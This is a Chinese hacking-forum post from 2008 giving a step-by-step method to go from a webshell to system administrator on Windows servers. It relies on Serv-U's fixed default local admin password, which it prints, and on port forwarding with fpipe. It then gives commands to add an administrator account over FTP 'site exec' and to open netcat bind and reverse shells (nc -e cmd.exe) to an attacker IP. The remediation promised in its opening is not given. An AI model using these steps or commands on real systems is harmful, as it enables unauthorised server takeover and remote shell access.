找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 787|回复: 0

利用Serv-U自身缺陷提升 Webshell权限

[复制链接]

32

主题

22

回帖

66

牛毛

初生牛犊

野狼

积分
66
发表于 2008-1-29 23:57:28 | 显示全部楼层 |阅读模式 来自 辽宁省铁岭市
笔者再次要详细说的是Webshell+Serv-U获取系统最高权限的方法及补救方法。

原理

Serv-U默认监听127.0.0.1:43***58,在本机才能连接这个管理端口,Serv-U默认管理账号是LocalAdministrator,默认密码是\"#l@$ak#.lk;0@P\",这个密码是固定的。在目标机器上运行fpipe -v -l 12***45 -r 43***58 127.0.0.1,然后在你自己的机器,用\"Serv-U administrator\"新建SERVER:


目标IP:12***45

User:LocalAdministrator

Pass:\"#l@$ak#.lk;0@P\"
那么目标机器的Serv-U就归你管了。

利用的前提:要有目标机器的普通权限的SHELL,不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了。

如何得到一个shell:sql注射得到Webshell或者直接利用动网7.0 sp2以下的上传漏洞上传Webshell。

具体实施方法

1.利用得到的Webshell上传转向程序fpipe,然后执行fpipe -v -l 12***45 -r 43***58 127.0.0.1。

2 .在你自己的机器,用\"Serv-U administrator\"新建SERVER,依次填入:


IP:目标IP

端口 :12***45

User:LocalAdministrator

Pass:\"#l@$ak#.lk;0@P\"
现在你就可以管理这台服务器的Serv-U了,新建一个账号,权限为系统管理员(system administrator),并在\"目录访问(Dir access)\"选项中给予\"执行\"权限(execute).

3. ftp连接,然后执行quote site exec net user iisuser password /add 添加一个用户名为iisuser密码为password的用户,加到管理员组 quote site exec net localgroup administrators iisuser /add,现在就可以连接终端并登录了。 

当然也可以进行别的操作,例如上传一个nc.exe,在目标机器上得到一个管理员权限的shell,可以正向连接,也可以反向连接。  

正向连接:连上ftp以后执行


quote site exec nc.exe -l -p 23 -t -e cmd.exe
这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口。   

反向连接:假设你的IP是202.96.209.168。

1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99

2.在目标机器上运行 nc -e cmd.exe 202.96.209.168  99

在你的机器上就会得到一个目标机器的具有管理员权限的shell。

如果对方进行了端口过滤或者设置了防火墙的保护(这种保护不限制反弹连接,如果限制的话就要换别的方法呢),可以用TCP SOCKET转发来实现。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-27 06:29 , Processed in 0.118022 second(s), 23 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表